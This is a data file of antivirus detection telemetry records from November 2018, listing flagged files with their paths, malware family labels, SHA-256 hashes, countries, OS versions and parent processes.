  Row(detection=Row(filename='avscan-20181102-091216-5fbc2657', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4bea89cb\\AVSCAN-20181102-091128-591E273C\\AVSCAN-20181102-091216-5FBC2657', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:12:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151918-6a62f6e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151918-6A62F6E7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:19:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_1b649c82.exe', filepath='E:\\UPD1.RLD.FA16\\Setup_1b649c82.exe', filesize=128000, name='HEUR/AGEN.1008878.#M1.#R1'), hash='bae28f50a97a46e67fba78fa185937d3cb645481ec0ff707a56b630e4f8566d5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe266_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe266 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='KE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=349184, timestamp='2018-11-01T15:57:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094823-2bf19b77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094823-2BF19B77', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:48:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094411-fb8afa62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094411-FB8AFA62', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:44:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='96951364ce27aee23100cc0419db51e4eb67accb932eddea6855279467490c06', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\96951364CE27AEE23100CC0419DB51E4EB67ACCB932EDDEA6855279467490C06', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='96951364ce27aee23100cc0419db51e4eb67accb932eddea6855279467490c06', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:39:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='daina annunciata.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\DAINA ANNUNCIATA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='udyb.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Axviy\\udyb.exe', filesize=320000, name='HEUR/AGEN.1002500.#M1.#R1'), hash='cd8fd5025afea49431ecd64a461374d6552d796e4fb43b042f484f8e7d426d5e', metadata=Row(cmdline='\\\\\\/scan \\\\\\/cleanclose', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Spybot - Search & Destroy 2\\SDScan.exe', parentsize=7651984, timestamp='2018-11-01T14:24:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180722-66c23210', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_587b4b83\\AVSCAN-20181101-180624-5C9E92F9\\AVSCAN-20181101-180722-66C23210', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\kw5vot2bki3\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:24:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095707-904f9fd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095707-904F9FD4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095131-4fd17e66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095131-4FD17E66', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T17:19:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093944-12d0d6ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_481d6786\\AVSCAN-20181101-090916-1E8EDAEF\\AVSCAN-20181101-093944-12D0D6AB', filesize=13264000, name='ADWARE/CrossRider.Gen.#M1.#R1'), hash='951f99e65efe12bc7a75c28025707f32dca35ce18ebf8fea558f1fef5f5b1086', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:41:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gdxsetup.exe', filepath='L:\\games\\barbie horse adventuer\\SUPPORT\\Directx\\gdxsetup.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='deea79a96bb55d80f3c1cbd102dbfcc24c135d5443970dbd06b082f9ff563f6d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\USB Disk Security\\USBGuard.exe', parentsize=695528, timestamp='2018-11-01T19:57:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-113156-8ef4d64b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c2e601a3\\AVSCAN-20181101-111000-7BE8D34B\\AVSCAN-20181101-113156-8EF4D64B', filesize=236000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='da7fb15e62f30de8f6d27794267bb5d9972da9f8e87ee7eb382cd874b3b88cd3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:31:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095424-7123b7bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095424-7123B7BD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:54:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='convenzione seriate.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\CONVENZIONE SERIATE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:17:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wunregbean.exe', filepath='C:\\Program Files\\IBM\\SQLLIB\\java\\jdk\\jre\\bin\\wunregbean.exe', filesize=128000, name='W32/Infector.Gen.#M300.#R7863'), hash='ec841e835f38110c52481ffa2b6cffacda73fa2d861644225989a32cc3870d70', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T03:40:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093406-87aac6e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093406-87AAC6E1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095124-4e84d979', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095124-4E84D979', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='001 .exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\data\\001\\001 .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='ed9b5a6c12380e1c575f72b74d60ffba551808cf32aa9234ef2243107c766d99', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-203600-54c21026', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e425a12\\AVSCAN-20181104-203459-4E013254\\AVSCAN-20181104-203600-54C21026', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='103587b3746bd7ab3fa4e1d0b317e5830ad16aec5b53179cb21f1c4926305a72', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:35:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132237-4acd9f7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132237-4ACD9F7A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:22:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T10:56:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='powershell.exe', filepath='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='9a4079b38c42774a86baa3a839e2a0458d874a6dfd75183e1b58125dddc0c650', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:25:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130848-0c29a672', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130848-0C29A672', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:08:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='027a37ff93d9170f112412eb63a19ce6d8ba7c92f75ca9051adcb791bf2cde45.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\17.01.2018-10.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1032585\\027a37ff93d9170f112412eb63a19ce6d8ba7c92f75ca9051adcb791bf2cde45.MRG', filesize=704000, name='HEUR/AGEN.1032585.#M1.#R1'), hash='027a37ff93d9170f112412eb63a19ce6d8ba7c92f75ca9051adcb791bf2cde45', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\18.02.2018-271.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-04T09:22:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165402-2532c9d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_95369046\\AVSCAN-20181104-164332-D4C777B9\\AVSCAN-20181104-165402-2532C9D1', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='9600a7a82fa27381b6c5a23c81326e60b1b30a39d0b20feb6a066b67ef1ea05e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:54:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135542-befe6c9c', filepath='C:\\Documents and Settings\\X\\Dane aplikacji\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-135308-BE772684\\AVSCAN-20181104-135542-BEFE6C9C', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='drvsetupx64.exe', filepath='f:\\lenovo s10-3 win7\\s10-3 win7\\digital_camera\\chicony0.3\\uvc_driver\\DrvSetupX64.exe', filesize=512000, name='W64/Infector.Gen8.#M300.#R700956'), hash='8a70f0c516fa9f8070663b8077a945c04fb7d16261dc48511f73c57fcaa195eb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:29:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173011-15296e08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173011-15296E08', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:30:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wspsetup.exe', filepath='\\?\\C:\\Users\\X\\Downloads\\wspsetup.exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:40:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T18:19:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155520-ea1c2d99', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_6bb2b461\\AVSCAN-20181104-154942-C4D2A19E\\AVSCAN-20181104-155520-EA1C2D99', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='2ffa0baef8f7fe1c15fddfbf27e2355e9ead317e07726d0bc12cd7bbfaf5eb6e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:55:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unwise.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Native Instruments\\FM8\\UNWISE.EXE', filesize=320000, name='W32/Sality.AT.#M1.#R1'), hash='5076374018cd585f7ed34b3725c7d6d590fe67c2f86eb93b08fb221334900efa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:09:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-074559-160f8d75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_63e0ab73\\AVSCAN-20181104-074040-F38039E3\\AVSCAN-20181104-074559-160F8D75', filesize=980000, name='PUA/InstallCore.KV.#M1.#R1'), hash='5b1e7e2a20c21b19c4a902791537ad7b82c85529dc4a540408209e7cb452fd7f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:46:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:14:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='7-zip.dll', filepath='D:\\the lasted software\\ansys step\\X64\\util\\7zip\\7-zip.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='5396834fe20eb5d62c841f3f383ea7c0fbdeb93496119aca02b5650f8a9e9073', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T15:16:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024363', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024363', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:47:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T16:49:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0342600.exe', filepath='F:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP434\\A0342600.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='ab257ba57ad491fd1817addd8392e913d929e398ddfb850bd7b4e60a1ff85b7c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T10:28:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:41:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='professional egr remover.exe', filepath='C:\\Program Files\\Professional EGR Remover\\Professional EGR Remover.exe', filesize=8000000, name='TR/Crypt.ZPACK.Gen.#M300.#R8169'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:21:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=257024, timestamp='2018-11-04T12:51:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:47:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T21:26:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-222100-62686c79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6931b99d\\AVSCAN-20181104-221652-2BB38B21\\AVSCAN-20181104-222100-62686C79', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:21:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:40:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d6cd', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d6cd', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:43:37Z'), dt=datetime.date(2018, 11, 4)),
